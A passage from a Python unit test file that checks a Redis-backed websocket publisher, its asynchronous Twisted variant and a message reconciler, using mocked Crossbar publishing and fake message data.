(7, 'gim.baz', None, [111], {'b': 222}),
]
with patch.object(self.publisher, 'send_message') as send_message:
self.publisher.send_messages(messages)
self.assertEqual(send_message.call_args_list, [
call(5, 'gim.bar', '667', 1, b=2, ws_extra={'topic': 'gim.bar', 'msg_id': 5}),
call(6, 'gim.foo', '666', 11, b=22, ws_extra={'topic': 'gim.foo', 'msg_id': 6}),
call(7, 'gim.baz', None, 111, b=222, ws_extra={'topic': 'gim.baz', 'msg_id': 7}),
])
def test_publish_for_repository(self):
with patch.object(self.publisher, 'save_message', return_value=123) as save_message:
with patch.object(self.publisher, 'send_message') as send_message:
with patch.object(self.publisher, 'send_unsent_messages') as send_unsent_messages:
msg_id = self.publisher.publish('foo', 666, 11, b=22)
self.assertEqual(msg_id, 123)
send_unsent_messages.assert_called_once_with()
save_message.assert_called_once_with('gim.foo', 666, 11, b=22)
send_message.assert_called_once_with(123, 'gim.foo', 666, 11, b=22,
ws_extra={'msg_id': 123, 'topic': 'gim.foo'})
def test_publish_not_for_repository(self):
with patch.object(self.publisher, 'save_message', return_value=123) as save_message:
with patch.object(self.publisher, 'send_message') as send_message:
with patch.object(self.publisher, 'send_unsent_messages') as send_unsent_messages:
msg_id = self.publisher.publish('foo', None, 11, b=22)
self.assertEqual(msg_id, 123)
send_unsent_messages.assert_called_once_with()
save_message.assert_called_once_with('gim.foo', None, 11, b=22)
send_message.assert_called_once_with(123, 'gim.foo', None, 11, b=22,
ws_extra={'msg_id': 123, 'topic': 'gim.foo'})
def test_get_unsent_bounds(self):
with patch.object(self.publisher, 'get_last_msg_id', return_value=10):
with patch.object(self.publisher, 'get_last_msg_id_sent', return_value=5):
result = self.publisher.get_unsent_bounds()
self.assertEqual(result, (6, 10))
with patch.object(self.publisher, 'get_last_msg_id', return_value=10):
with patch.object(self.publisher, 'get_last_msg_id_sent', return_value=10):
result = self.publisher.get_unsent_bounds()
self.assertEqual(result, (11, 10))
def test_send_unsent_messages(self):
# Send some messages
with patch.object(self.publisher.http_client, 'publish'):
self.publisher.publish('foo', 666, 1, b=2) # id 1
self.publisher.publish('foo', 666, 11, b=22) # id 2
self.publisher.publish('foo', 666, 111, b=222) # id 3
self.publisher.publish('foo2', 666, 1111, b=2222) # id 4
# Send unsent ones: there is no unsent message
with patch.object(self.publisher, 'send_messages') as send_messages:
self.publisher.send_unsent_messages()
self.assertEqual(send_messages.call_count, 0)
# Fake send more messages
with patch.object(self.publisher, 'send_message'):
# And don't try to send unsent messages for now
with patch.object(self.publisher, 'send_unsent_messages'):
self.publisher.publish('bar', 667, 11111, b=22222) # id 5
self.publisher.publish('foo', 666, 111111, b=222222) # id 6
self.publisher.publish('baz', None, 1111111, b=2222222) # id 7
# Send unsent ones: there is 3 unsent messages
with patch.object(self.publisher, 'send_message') as send_message:
self.publisher.send_unsent_messages()
self.assertEqual(send_message.call_args_list, [
call(5, 'gim.bar', '667', 11111, b=22222, ws_extra={'topic': 'gim.bar', 'msg_id': 5}),
call(6, 'gim.foo', '666', 111111, b=222222, ws_extra={'topic': 'gim.foo', 'msg_id': 6}),
call(7, 'gim.baz', None, 1111111, b=2222222, ws_extra={'topic': 'gim.baz', 'msg_id': 7}),
])
def test_publish_send_unsent_messages(self):
# Send some messages
with patch.object(self.publisher.http_client, 'publish'):
self.publisher.publish('foo', 666, 1, b=2) # id 1
self.publisher.publish('foo', 666, 11, b=22) # id 2
self.publisher.publish('foo', 666, 111, b=222) # id 3
self.publisher.publish('foo2', 666, 1111, b=2222) # id 4
# Fake send more messages
with patch.object(self.publisher, 'send_message'):
self.publisher.publish('bar', 667, 11111, b=22222) # id 5
self.publisher.publish('foo', 666, 111111, b=222222) # id 6
self.publisher.publish('baz', None, 1111111, b=2222222) # id 7
# Send one with sending reactivated,
with patch.object(self.publisher.http_client, 'publish') as publish:
self.publisher.publish('baz2', None, 11111111, b=22222222) # id 8
self.assertEqual(publish.call_args_list, [
call('gim.bar', 11111, b=22222, ws_extra={'msg_id': 5, 'topic': 'gim.bar'}),
call('gim.foo', 111111, b=222222, ws_extra={'msg_id': 6, 'topic': 'gim.foo'}),
call('gim.baz', 1111111, b=2222222, ws_extra={'msg_id': 7, 'topic': 'gim.baz'}),
call('gim.baz2', 11111111, b=22222222, ws_extra={'msg_id': 8, 'topic': 'gim.baz2'}),
])
def test_get_messages(self):
# Send two messages
with patch.object(self.publisher.http_client, 'publish'):
self.publisher.publish('foo', 666, 1, b=2) # id 1
self.publisher.publish('foo', 666, 11, b=22) # id 2
# Fake send more messages
with patch.object(self.publisher, 'send_message'):
# And don't try to send unsent messages for now
with patch.object(self.publisher, 'send_unsent_messages'):
self.publisher.publish('foo', 666, 111, b=222) # id 3
self.publisher.publish('foo2', 666, 1111, b=2222) # id 4
self.publisher.publish('bar', 667, 11111, b=22222) # id 5
self.publisher.publish('foo', 666, 111111, b=222222) # id 6
self.publisher.publish('baz', None, 1111111, b=2222222) # id 7
self.publisher.publish('baz2', None, 11111111, b=22222222) # id 8
result = self.publisher.get_messages(3, 7)
self.assertEqual(result, [
(3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
'gim.foo', [], '666'),
(4, {'topic': 'gim.foo2', 'msg_id': 4, 'args': [1111], 'kwargs': {'b': 2222}},
'gim.foo2', [], '666'),
(5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
'gim.bar', [], '667'),
(6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
'gim.foo', [], '666'),
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [], None),
])
result = self.publisher.get_messages(3, 7, [
('gim.foo', ws.TOPIC_TYPE_EXACT),
('gim.ba', ws.TOPIC_TYPE_PREFIX),
])
self.assertEqual(result, [
(3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
(5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
'gim.bar', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], '667'),
(6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], None),
])
result = self.publisher.get_messages()
self.assertEqual(result, [
(1, {'topic': 'gim.foo', 'msg_id': 1, 'args': [1], 'kwargs': {'b': 2}},
'gim.foo', [], '666'),
(2, {'topic': 'gim.foo', 'msg_id': 2, 'args': [11], 'kwargs': {'b': 22}},
'gim.foo', [], '666'),
(3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
'gim.foo', [], '666'),
(4, {'topic': 'gim.foo2', 'msg_id': 4, 'args': [1111], 'kwargs': {'b': 2222}},
'gim.foo2', [], '666'),
(5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
'gim.bar', [], '667'),
(6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
'gim.foo', [], '666'),
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [], None),
(8, {'topic': 'gim.baz2', 'msg_id': 8, 'args': [11111111], 'kwargs': {'b': 22222222}},
'gim.baz2', [], None),
])
result = self.publisher.get_messages(first_msg_id=7)
self.assertEqual(result, [
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [], None),
(8, {'topic': 'gim.baz2', 'msg_id': 8, 'args': [11111111], 'kwargs': {'b': 22222222}},
'gim.baz2', [], None),
])
result = self.publisher.get_messages(last_msg_id=2)
self.assertEqual(result, [
(1, {'topic': 'gim.foo', 'msg_id': 1, 'args': [1], 'kwargs': {'b': 2}},
'gim.foo', [], '666'),
(2, {'topic': 'gim.foo', 'msg_id': 2, 'args': [11], 'kwargs': {'b': 22}},
'gim.foo', [], '666'),
])
def test_remove_repository(self):
# Add some messages
with patch.object(self.publisher.http_client, 'publish'):
self.publisher.publish('foo', 666, 1, b=2) # id 1
self.publisher.publish('foo', 667, 11, b=22) # id 2
self.publisher.publish('foo', None, 111, b=222) # id 3
self.publisher.publish('bar', 666, 1111, b=2222) # id 4
self.publisher.publish('bar', 667, 11111, b=22222) # id 5
self.publisher.publish('bar', None, 111111, b=222222) # id 6
self.publisher.remove_repository(667)
# The repository must have been deleted
with self.assertRaises(DoesNotExist):
ws.RepositoryHistory.get(667)
# No traces of the repository in the publisher
repositories = self.publisher.repositories.zrange(0, -1, withscores=True)
self.assertEqual(repositories, [
('1:666', 1),
('2:', 2),
('3:', 3),
('4:666', 4),
('5:', 5),
('6:', 6),
])
def test_clean(self):
# Set some topics for the publisher (without repository)
messages_foo = self.publisher.messages.get_for('foo')
messages_bar = self.publisher.messages.get_for('bar.xxx')
# With messages
messages_foo.zadd(20, json.dumps({'foo': 'msg-2'}))
self.publisher.repositories.zadd(20, '20:')
messages_bar.zadd(30, json.dumps({'bar': 'msg-3'}))
self.publisher.repositories.zadd(30, '30:')
messages_foo.zadd(40, json.dumps({'foo': 'msg-4'}))
self.publisher.repositories.zadd(40, '40:')
messages_foo.zadd(50, json.dumps({'foo': 'msg-5'}))
self.publisher.repositories.zadd(50, '50:')
# Same for some topics too
repo1 = ws.RepositoryHistory(pk=666)
messages_foo = repo1.messages.get_for('foo')
messages_bar = repo1.messages.get_for('bar.xxx')
messages_foo.zadd(21, json.dumps({'foo': 'msg-2'}))
self.publisher.repositories.zadd(21, '21:666')
messages_bar.zadd(31, json.dumps({'bar': 'msg-3'}))
self.publisher.repositories.zadd(31, '31:666')
messages_foo.zadd(41, json.dumps({'foo': 'msg-4'}))
self.publisher.repositories.zadd(41, '41:666')
messages_foo.zadd(51, json.dumps({'foo': 'msg-5'}))
self.publisher.repositories.zadd(51, '51:666')
repo2 = ws.RepositoryHistory(pk=667)
messages_foo = repo2.messages.get_for('foo')
messages_bar = repo2.messages.get_for('bar.xxx')
messages_foo.zadd(22, json.dumps({'foo': 'msg-2'}))
self.publisher.repositories.zadd(22, '22:667')
messages_bar.zadd(32, json.dumps({'bar': 'msg-3'}))
self.publisher.repositories.zadd(32, '32:667')
messages_foo.zadd(42, json.dumps({'foo': 'msg-4'}))
self.publisher.repositories.zadd(42, '42:667')
messages_foo.zadd(52, json.dumps({'foo': 'msg-5'}))
self.publisher.repositories.zadd(52, '52:667')
deleted = self.publisher.clean(35)
self.assertEqual(deleted, 6)
# No trace of the deleted messages anymore
ids = self.publisher.get_all_message_ids()
self.assertEqual(set(ids), {40, 50})
# Same for repositories
ids = repo1.get_all_message_ids()
self.assertEqual(set(ids), {41, 51})
ids = repo2.get_all_message_ids()
self.assertEqual(set(ids), {42, 52})
# Check also in the main zset containing all messages
entries = self.publisher.repositories.zrange(0, -1, withscores=True)
self.assertEqual(entries, [
(u'40:', 40.0),
(u'41:666', 41.0),
(u'42:667', 42.0),
(u'50:', 50.0),
(u'51:666', 51.0),
(u'52:667', 52.0),
])
class FakeCrossbar:
@inlineCallbacks
def publish(self, topic, *args, **kwargs):
pass
class AsyncPublisherTestCase(UsingAsyncRedis):
PK = ws.Publisher.PK
sPK = str(PK)
@inlineCallbacks
def setUp(self):
yield super(AsyncPublisherTestCase, self).setUp()
self.app = FakeCrossbar()
self.publisher = yield ws.AsyncPublisher.get_for(self.PK, app=self.app)
@inlineCallbacks
def test_get_for_without_pipeline(self):
# Existing entry
result = yield ws.AsyncPublisher.get_for(666, app=self.app)
self.assertIsInstance(result.source_object, ws.Publisher)
self.assertEqual(result.source_object._pk, self.sPK)
# Without pk
result = yield ws.AsyncPublisher.get_for(app=self.app)
self.assertIsInstance(result.source_object, ws.Publisher)
self.assertEqual(result.source_object._pk, self.sPK)
# Non existing entry
self.flushdb()
result = yield ws.AsyncPublisher.get_for(667, app=self.app)
self.assertIsInstance(result.source_object, ws.Publisher)
self.assertEqual(result.source_object._pk, self.sPK)
@inlineCallbacks
def test_get_for_with_pipeline(self):
pipeline = yield self.db.multi()
result = yield ws.AsyncPublisher.get_for(666, pipeline=pipeline, app=self.app)
yield pipeline.commit()
self.assertIsInstance(result.source_object, ws.Publisher)
self.assertEqual(result.source_object._pk, self.sPK)
def assert_called_once_with_pipeline(self, patched, *args, **kwargs):
self.assertEqual(patched.call_count, 1)
self.assertEqual(patched.call_args[0], args)
call_kwargs = patched.call_args[1].copy()
self.assertIsInstance(call_kwargs.pop('pipeline'), txredis.BaseRedisProtocol)
self.assertEqual(call_kwargs, kwargs)
def test_lock_key(self):
self.assertEqual(self.publisher.lock_key, 'ws4:publisher:%s:lock' % self.sPK)
def test_lock_publishing(self):
lock = self.publisher.lock_publishing()
self.assertIsInstance(lock, ws.txLock)
self.assertEqual(lock.name, self.publisher.lock_key)
@inlineCallbacks
def test_save_message_for_repository(self):
with patch.object(ws.AsyncRepositoryHistory, 'save_message') as repository_save_message:
msg_id = yield self.publisher.save_message('foo', 666, 11, b=22)
self.assertEqual(msg_id, 1)
result = yield self.publisher.get_last_msg_id()
self.assertEqual(result, 1)
# Check the message id is tied to the repository
repositories = yield self.db.zrange(self.publisher.source_object.repositories.key, 0, -1,
withscores=True)
self.assertEqual(repositories, [
('1:666', 1)
])
# We should have called `save_message` for the repository
self.assert_called_once_with_pipeline(repository_save_message, 1, 'foo', 11, b=22)
# And the message should not be stored in the global store
messages = yield self.db.zrange(self.publisher.source_object.messages.get_for('foo').key,
0, -1, withscores=True)
self.assertEqual(messages, [])
@inlineCallbacks
def test_save_message_not_for_repository(self):
with patch.object(ws.RepositoryHistory, 'save_message') as repository_save_message:
msg_id = yield self.publisher.save_message('foo', None, 11, b=22)
self.assertEqual(msg_id, 1)
result = yield self.publisher.get_last_msg_id()
self.assertEqual(result, 1)
# Check the message id is NOT tied to the repository
repositories = yield self.db.zrange(self.publisher.source_object.repositories.key, 0, -1,
withscores=True)
self.assertEqual(repositories, [
('1:', 1)
])
# We should have NOT called `save_message` for the repository
self.assertEqual(repository_save_message.call_count, 0)
# But the message should be stored in the global store
messages = yield self.db.zrange(self.publisher.source_object.messages.get_for('foo').key,
0, -1, withscores=True)
self.assertEqual(messages, [
(ws.serialize(1, 'foo', 11, b=22), 1),
])
@inlineCallbacks
def test_send_message_for_repository(self):
with patch.object(FakeCrossbar, 'publish') as publish:
yield self.publisher.send_message(123, 'foo', 666, 11, b=22)
# We published to crossbar
publish.assert_called_once_with('foo', 11, b=22)
# We saved the last message for the repository
obj = yield ws.AsyncRepositoryHistory.get_for(666)
last_msg_id_sent = yield obj.get_last_msg_id_sent()
self.assertEqual(last_msg_id_sent, 123)
# And globally
last_msg_id_sent = yield self.publisher.get_last_msg_id_sent()
self.assertEqual(last_msg_id_sent, 123)
@inlineCallbacks
def test_send_message_not_for_repository(self):
with patch.object(FakeCrossbar, 'publish') as publish:
with patch.object(ws.RepositoryHistory, 'save_last_sent_message') as \
repository_save_last_sent_message:
yield self.publisher.send_message(123, 'foo', None, 11, b=22)
# We published to crossbar
publish.assert_called_once_with('foo', 11, b=22)
# We DIDN'T save the last message for any repository
self.assertEqual(repository_save_last_sent_message.call_count, 0)
# But globally
last_msg_id_sent = yield self.publisher.get_last_msg_id_sent()
self.assertEqual(last_msg_id_sent, 123)
@inlineCallbacks
def test_send_messages(self):
messages = [
(5, 'gim.bar', '667', [1], {'b': 2}),
(6, 'gim.foo', '666', [11], {'b': 22}),
(7, 'gim.baz', None, [111], {'b': 222}),
]
with patch.object(self.publisher, 'send_message') as send_message:
yield self.publisher.send_messages(messages)
self.assertEqual(send_message.call_args_list, [
call(5, 'gim.bar', '667', 1, b=2, ws_extra={'topic': 'gim.bar', 'msg_id': 5}),
call(6, 'gim.foo', '666', 11, b=22, ws_extra={'topic': 'gim.foo', 'msg_id': 6}),
call(7, 'gim.baz', None, 111, b=222, ws_extra={'topic': 'gim.baz', 'msg_id': 7}),
])
@inlineCallbacks
def test_publish_for_repository(self):
with patch.object(self.publisher, 'save_message', return_value=123) as save_message:
with patch.object(self.publisher, 'send_message') as send_message:
with patch.object(self.publisher, 'send_unsent_messages') as send_unsent_messages:
msg_id = yield self.publisher.publish('foo', 666, 11, b=22)
self.assertEqual(msg_id, 123)
send_unsent_messages.assert_called_once_with()
save_message.assert_called_once_with('gim.foo', 666, 11, b=22)
send_message.assert_called_once_with(123, 'gim.foo', 666, 11, b=22,
ws_extra={'msg_id': 123, 'topic': 'gim.foo'})
@inlineCallbacks
def test_publish_not_for_repository(self):
with patch.object(self.publisher, 'save_message', return_value=123) as save_message:
with patch.object(self.publisher, 'send_message') as send_message:
with patch.object(self.publisher, 'send_unsent_messages') as send_unsent_messages:
msg_id = yield self.publisher.publish('foo', None, 11, b=22)
self.assertEqual(msg_id, 123)
send_unsent_messages.assert_called_once_with()
save_message.assert_called_once_with('gim.foo', None, 11, b=22)
send_message.assert_called_once_with(123, 'gim.foo', None, 11, b=22,
ws_extra={'msg_id': 123, 'topic': 'gim.foo'})
@inlineCallbacks
def test_get_unsent_bounds(self):
with patch.object(self.publisher, 'get_last_msg_id', return_value=10):
with patch.object(self.publisher, 'get_last_msg_id_sent', return_value=5):
result = yield self.publisher.get_unsent_bounds()
self.assertEqual(result, (6, 10))
with patch.object(self.publisher, 'get_last_msg_id', return_value=10):
with patch.object(self.publisher, 'get_last_msg_id_sent', return_value=10):
result = yield self.publisher.get_unsent_bounds()
self.assertEqual(result, (11, 10))
@inlineCallbacks
def test_send_unsent_messages(self):
# Send some messages
with patch.object(FakeCrossbar, 'publish'):
yield self.publisher.publish('foo', 666, 1, b=2) # id 1
yield self.publisher.publish('foo', 666, 11, b=22) # id 2
yield self.publisher.publish('foo', 666, 111, b=222) # id 3
yield self.publisher.publish('foo2', 666, 1111, b=2222) # id 4
# Send unsent ones: there is no unsent message
with patch.object(self.publisher, 'send_messages') as send_messages:
yield self.publisher.send_unsent_messages()
self.assertEqual(send_messages.call_count, 0)
# Fake send more messages
with patch.object(self.publisher, 'send_message'):
# And don't try to send unsent messages for now
with patch.object(self.publisher, 'send_unsent_messages'):
yield self.publisher.publish('bar', 667, 11111, b=22222) # id 5
yield self.publisher.publish('foo', 666, 111111, b=222222) # id 6
yield self.publisher.publish('baz', None, 1111111, b=2222222) # id 7
# Send unsent ones: there is 3 unsent messages
with patch.object(self.publisher, 'send_message') as send_message:
yield self.publisher.send_unsent_messages()
self.assertEqual(send_message.call_args_list, [
call(5, 'gim.bar', '667', 11111, b=22222, ws_extra={'topic': 'gim.bar', 'msg_id': 5}),
call(6, 'gim.foo', '666', 111111, b=222222, ws_extra={'topic': 'gim.foo', 'msg_id': 6}),
call(7, 'gim.baz', None, 1111111, b=2222222, ws_extra={'topic': 'gim.baz', 'msg_id': 7}),
])
@inlineCallbacks
def test_publish_send_unsent_messages(self):
# Send some messages
with patch.object(FakeCrossbar, 'publish'):
yield self.publisher.publish('foo', 666, 1, b=2) # id 1
yield self.publisher.publish('foo', 666, 11, b=22) # id 2
yield self.publisher.publish('foo', 666, 111, b=222) # id 3
yield self.publisher.publish('foo2', 666, 1111, b=2222) # id 4
# Fake send more messages
with patch.object(self.publisher, 'send_message'):
yield self.publisher.publish('bar', 667, 11111, b=22222) # id 5
yield self.publisher.publish('foo', 666, 111111, b=222222) # id 6
yield self.publisher.publish('baz', None, 1111111, b=2222222) # id 7
# Send one with sending reactivated,
with patch.object(FakeCrossbar, 'publish') as publish:
yield self.publisher.publish('baz2', None, 11111111, b=22222222) # id 8
self.assertEqual(publish.call_args_list, [
call('gim.bar', 11111, b=22222, ws_extra={'msg_id': 5, 'topic': 'gim.bar'}),
call('gim.foo', 111111, b=222222, ws_extra={'msg_id': 6, 'topic': 'gim.foo'}),
call('gim.baz', 1111111, b=2222222, ws_extra={'msg_id': 7, 'topic': 'gim.baz'}),
call('gim.baz2', 11111111, b=22222222, ws_extra={'msg_id': 8, 'topic': 'gim.baz2'}),
])
@inlineCallbacks
def test_get_messages(self):
# Send two messages
with patch.object(FakeCrossbar, 'publish'):
yield self.publisher.publish('foo', 666, 1, b=2) # id 1
yield self.publisher.publish('foo', 666, 11, b=22) # id 2
# Fake send more messages
with patch.object(self.publisher, 'send_message'):
# And don't try to send unsent messages for now
with patch.object(self.publisher, 'send_unsent_messages'):
yield self.publisher.publish('foo', 666, 111, b=222) # id 3
yield self.publisher.publish('foo2', 666, 1111, b=2222) # id 4
yield self.publisher.publish('bar', 667, 11111, b=22222) # id 5
yield self.publisher.publish('foo', 666, 111111, b=222222) # id 6
yield self.publisher.publish('baz', None, 1111111, b=2222222) # id 7
yield self.publisher.publish('baz2', None, 11111111, b=22222222) # id 8
result = yield self.publisher.get_messages(3, 7)
self.assertEqual(result, [
(3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
'gim.foo', [], '666'),
(4, {'topic': 'gim.foo2', 'msg_id': 4, 'args': [1111], 'kwargs': {'b': 2222}},
'gim.foo2', [], '666'),
(5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
'gim.bar', [], '667'),
(6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
'gim.foo', [], '666'),
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [], None),
])
result = yield self.publisher.get_messages(3, 7, [
('gim.foo', ws.TOPIC_TYPE_EXACT),
('gim.ba', ws.TOPIC_TYPE_PREFIX),
])
self.assertEqual(result, [
(3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
(5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
'gim.bar', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], '667'),
(6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], None),
])
result = yield self.publisher.get_messages()
self.assertEqual(result, [
(1, {'topic': 'gim.foo', 'msg_id': 1, 'args': [1], 'kwargs': {'b': 2}},
'gim.foo', [], '666'),
(2, {'topic': 'gim.foo', 'msg_id': 2, 'args': [11], 'kwargs': {'b': 22}},
'gim.foo', [], '666'),
(3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
'gim.foo', [], '666'),
(4, {'topic': 'gim.foo2', 'msg_id': 4, 'args': [1111], 'kwargs': {'b': 2222}},
'gim.foo2', [], '666'),
(5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
'gim.bar', [], '667'),
(6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
'gim.foo', [], '666'),
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [], None),
(8, {'topic': 'gim.baz2', 'msg_id': 8, 'args': [11111111], 'kwargs': {'b': 22222222}},
'gim.baz2', [], None),
])
result = yield self.publisher.get_messages(first_msg_id=7)
self.assertEqual(result, [
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [], None),
(8, {'topic': 'gim.baz2', 'msg_id': 8, 'args': [11111111], 'kwargs': {'b': 22222222}},
'gim.baz2', [], None),
])
result = yield self.publisher.get_messages(last_msg_id=2)
self.assertEqual(result, [
(1, {'topic': 'gim.foo', 'msg_id': 1, 'args': [1], 'kwargs': {'b': 2}},
'gim.foo', [], '666'),
(2, {'topic': 'gim.foo', 'msg_id': 2, 'args': [11], 'kwargs': {'b': 22}},
'gim.foo', [], '666'),
])
@inlineCallbacks
def test_remove_repository(self):
# Add some messages
with patch.object(FakeCrossbar, 'publish'):
yield self.publisher.publish('foo', 666, 1, b=2) # id 1
yield self.publisher.publish('foo', 667, 11, b=22) # id 2
yield self.publisher.publish('foo', None, 111, b=222) # id 3
yield self.publisher.publish('bar', 666, 1111, b=2222) # id 4
yield self.publisher.publish('bar', 667, 11111, b=22222) # id 5
yield self.publisher.publish('bar', None, 111111, b=222222) # id 6
repository = yield ws.AsyncRepositoryHistory.get_for(667)
yield self.publisher.remove_repository(667)
# The repository must have been deleted
collection = yield self.db.smembers(repository.source_object.pk.collection_key)
self.assertEqual(collection, {666})
# No traces of the repository in the publisher
repositories = yield self.db.zrange(self.publisher.source_object.repositories.key, 0, -1,
withscores=True)
self.assertEqual(repositories, [
('1:666', 1),
('2:', 2),
('3:', 3),
('4:666', 4),
('5:', 5),
('6:', 6),
])
class ReconcilerTestCase(UsingAsyncRedis):
@inlineCallbacks
def setUp(self):
yield super(ReconcilerTestCase, self).setUp()
self.app = FakeCrossbar()
self.publisher = yield ws.AsyncPublisher.get_for(app=self.app)
self.reconciler = ws.Reconciler(self.publisher)
def test_limit_rules(self):
result = self.reconciler.limit_rules([
('gim.front.foo', ws.TOPIC_TYPE_EXACT),
('gim.foo', ws.TOPIC_TYPE_EXACT),
('gim.front.bar', ws.TOPIC_TYPE_WILDCARD),
('gim.', ws.TOPIC_TYPE_PREFIX),
('gim.front.foo..bar', ws.TOPIC_TYPE_WILDCARD),
('gim.front.foo', ws.TOPIC_TYPE_PREFIX),
])
self.assertEqual(result, {
('gim.front.foo', ws.TOPIC_TYPE_EXACT),
('gim.front.foo..bar', ws.TOPIC_TYPE_WILDCARD),
('gim.front.foo', ws.TOPIC_TYPE_PREFIX),
})
@inlineCallbacks
def test_validate_ids(self):
valid, error = yield self.reconciler.validate_ids('a')
self.assertFalse(valid)
self.assertIsInstance(error, dict)
self.assertEqual(error.keys(), ['error'])
self.assertEqual(error['error']['code'], 'REC0001')
valid, error = yield self.reconciler.validate_ids(1, 'b')
self.assertFalse(valid)
self.assertEqual(error['error']['code'], 'REC0001')
valid, error = yield self.reconciler.validate_ids(3, 3)
self.assertFalse(valid)
self.assertEqual(error['error']['code'], 'REC0001')
valid, error = yield self.reconciler.validate_ids(4, 3)
self.assertFalse(valid)
self.assertEqual(error['error']['code'], 'REC0001')
# Simulate 2 sent messages, with id 2 and 3
yield self.db.zadd(self.publisher.source_object.repositories.key, 2, '2:')
yield self.db.zadd(self.publisher.source_object.repositories.key, 3, '3:')
valid, error = yield self.reconciler.validate_ids(1)
self.assertFalse(valid)
self.assertEqual(error['error']['code'], 'REC0002')
valid, error = yield self.reconciler.validate_ids(1, 4)
self.assertFalse(valid)
self.assertEqual(error['error']['code'], 'REC0002')
valid, error = yield self.reconciler.validate_ids(2)
self.assertTrue(valid)
self.assertIsNone(error)
valid, error = yield self.reconciler.validate_ids(2, 3)
self.assertTrue(valid)
self.assertIsNone(error)
valid, error = yield self.reconciler.validate_ids(2, 4)
self.assertFalse(valid)
self.assertEqual(error['error']['code'], 'REC0003')
def test_prepare_messages(self):
messages = [
(6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
(7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
'gim.baz', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], None),
]
result = self.reconciler.prepare_messages(messages)
self.assertEqual(result, [
{'args': [111111], 'kwargs': {'b': 222222,
'ws_extra': {'topic': 'gim.foo', 'msg_id': 6,
'subscribed': [('gim.foo', ws.TOPIC_TYPE_EXACT), ]}}},
{'args': [1111111], 'kwargs': {'b': 2222222,
'ws_extra': {'topic': 'gim.baz', 'msg_id': 7,
'subscribed': [('gim.ba', ws.TOPIC_TYPE_PREFIX), ]}}},
])
@inlineCallbacks
def test_get_data(self):
# Start at id 2 to test reconciliation with previous id
self.db.set(self.publisher.source_object.last_msg_id.key, 2)
# Send some messages
with patch.object(FakeCrossbar, 'publish'):
yield self.publisher.publish('front.foo', 666, 111, b=222) # id 3
yield self.publisher.publish('front.foo2', 666, 1111, b=2222) # id 4
yield self.publisher.publish('front.bar', 667, 11111, b=22222) # id 5
yield self.publisher.publish('front.foo', 666, 111111, b=222222) # id 6
yield self.publisher.publish('front.baz', None, 1111111, b=2222222) # id 7
yield self.publisher.publish('front.baz2', None, 11111111, b=22222222) # id 8
# from_msg_id too low
result = yield self.reconciler.get_data(last_received_id=1, next_received_id=None,
topics_rules=[
('gim.front.foo', ws.TOPIC_TYPE_EXACT),
('gim.front.ba', ws.TOPIC_TYPE_PREFIX),
], iteration=1)
self.assertIsInstance(result, dict)
self.assertEqual(result.keys(), ['error'])
# The client already received all the messages
result = yield self.reconciler.get_data(last_received_id=8, next_received_id=None,
topics_rules=[
('gim.front.foo', ws.TOPIC_TYPE_EXACT),
('gim.front.ba', ws.TOPIC_TYPE_PREFIX),
], iteration=1)
self.assertEqual(result, {
'missed_messages': [],
'max_msg_id': 8,
'last_msg_id': 8,
'iteration': 1.
})
# The client needed some messages
result = yield self.reconciler.get_data(last_received_id=4, next_received_id=None,
